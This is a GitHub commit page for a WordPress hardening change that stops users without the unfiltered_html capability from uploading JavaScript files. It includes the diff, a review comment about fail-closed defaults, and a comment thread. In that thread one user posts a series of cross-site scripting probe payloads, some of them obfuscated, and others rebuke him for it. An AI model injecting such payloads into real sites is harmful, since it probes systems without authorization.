Hardening: Remove the ability to upload JavaScript files for users who do not have the `unfiltered_html` capability.

Built from https://develop.svn.wordpress.org/trunk@42261


git-svn-id: http://core.svn.wordpress.org/trunk@42090 1a063a9b-81f0-0310-95a4-ce76da25c4cd
johnbillion committed Nov 29, 2017
1 parent f1de7e4 commit 67d03a98c2cae5f41843c897f206adde299b0509
Showing with 4 additions and 3 deletions.
  1. +3 −2 wp-includes/functions.php
  2. +1 −1 wp-includes/version.php
@@ -2565,8 +2565,9 @@ function get_allowed_mime_types( $user = null ) {
if ( function_exists( 'current_user_can' ) )
$unfiltered = $user ? user_can( $user, 'unfiltered_html' ) : current_user_can( 'unfiltered_html' );

if ( empty( $unfiltered ) )
unset( $t['htm|html'] );
if ( empty( $unfiltered ) ) {
unset( $t['htm|html'], $t['js'] );
}

/**
* Filters list of allowed mime types and file extensions.
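Review bot: `$unfiltered` is assigned only inside the `if ( function_exists( 'current_user_can' ) )` branch, so when that function is not yet loaded the restrictive path is taken only because `empty()` treats an undefined variable as empty; adding an explicit `$unfiltered = false;` before the `if` makes the fail-closed default deliberate rather than incidental. Also worth noting in the docblock that follows ("Filters list of allowed mime types and file extensions."): the capability-based removal of `htm|html` and `js` happens before the filter runs, so a plugin hooking that filter can reinstate `js` for users without `unfiltered_html`; stating that ordering in the docblock would help plugin authors avoid silently undoing this hardening.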
@@ -4,7 +4,7 @@
*
* @global string $wp_version
*/
$wp_version = '5.0-alpha-42260';
$wp_version = '5.0-alpha-42261';

/**
* Holds the WordPress DB revision, increments when changes are made to the WordPress DB schema.

10 comments on commit 67d03a9

This comment was marked as spam.

@Yusufali0377 Yusufali0377 replied Jan 21, 2018

">

Clickme

This comment was marked as spam.

@Yusufali0377 Yusufali0377 replied Jan 21, 2018

"><textarea autofocus onfocus=co\u006efir\u006d(1)>

This comment was marked as spam.

@Yusufali0377 Yusufali0377 replied Jan 21, 2018

"><h1/ondrag=co\u006efir\u006d1)>DragMe

This comment was marked as spam.

@Yusufali0377 Yusufali0377 replied Jan 21, 2018

"><ScRiPt>co\u006efir\u006d1</ScRiPt>

This comment was marked as spam.

@Yusufali0377 Yusufali0377 replied Jan 21, 2018

">

Clickme

This comment was marked as spam.

@Yusufali0377 Yusufali0377 replied Jan 21, 2018

">

Clickme

This comment was marked as spam.

@Yusufali0377 Yusufali0377 replied Jan 21, 2018

"><a href=javascript:prompt%28 1%29>Clickme

This comment was marked as spam.

@Yusufali0377 Yusufali0377 replied Jan 21, 2018

"><img/src=x%0Aonerror=prompt1>

This comment has been minimized.

Member Author

@johnbillion johnbillion replied Jan 21, 2018

@Yusufali0377 This is not the place to test security vulnerabilities. Use your own repo.

This comment was marked as off-topic.

@DP44 DP44 replied Jul 8, 2018

@Yusufali0377 wtf are you doing? Those XSS payloads are useless, GitHub isn't vulnerable to them, moron.
